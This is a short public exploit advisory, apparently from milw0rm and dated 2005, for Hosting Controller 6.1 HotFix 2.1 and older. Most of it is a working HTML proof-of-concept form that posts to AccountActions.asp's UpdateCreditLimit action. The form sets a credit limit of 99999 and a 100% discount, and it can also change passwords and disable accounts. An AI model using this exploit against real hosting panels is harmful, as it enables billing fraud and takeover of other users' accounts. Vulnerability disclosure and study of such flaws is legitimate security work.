54 lines
No EOL
1.5 KiB
Text
54 lines
No EOL
1.5 KiB
Text
Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).
|
|
Title: Hosting controller program have a security bug in "AccountActions.asp" that an authenticated
|
|
user can change his/her credit and buy some services!
|
|
|
|
Version: 6.1 HotFix 2.1 and older
|
|
Developer url: hostingcontroller.com
|
|
Comment: Hosting Controller is an application to manage a host.
|
|
Exploit code to proof:
|
|
--------------------------------
|
|
GET CREDIT<br>Soroush Dalili from GSG<br>
|
|
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
|
|
<table>
|
|
<tr>
|
|
<td>Username:</td>
|
|
<td><input type="text" name="UserName" value=""></td>
|
|
</tr>
|
|
<tr>
|
|
<td>Description:</td>
|
|
<td><input type="text" name="Description" value=""></td>
|
|
</tr>
|
|
<tr>
|
|
<td>FullName:</td>
|
|
<td><input type="text" name="FullName" value=""></td>
|
|
</tr>
|
|
<tr>
|
|
<td>AccountDisabled 1,[blank]:</td>
|
|
<td><input type="text" name="AccountDisabled" value=""></td>
|
|
</tr>
|
|
<tr>
|
|
<td>UserChangePassword:</td>
|
|
<td><input type="text" name="UserChangePassword" value=""></td>
|
|
</tr>
|
|
<tr>
|
|
<td>PassCheck=TRUE,0:</td>
|
|
<td><input type="text" name="PassCheck" value="0"></td>
|
|
</tr>
|
|
<tr>
|
|
<td>New Password:</td>
|
|
<td><input type="text" name="Pass1" value=""></td>
|
|
</tr>
|
|
<tr>
|
|
<td>DefaultDiscount%:</td>
|
|
<td><input type="text" name="DefaultDiscount" value="100"></td>
|
|
</tr>
|
|
<tr>
|
|
<td>CreditLimit:</td>
|
|
<td><input type="text" name="CreditLimit" value="99999"></td>
|
|
</tr>
|
|
</table>
|
|
<br><input type="submit">
|
|
</form>
|
|
<hr><br>
|
|
|
|
# milw0rm.com [2005-07-10] |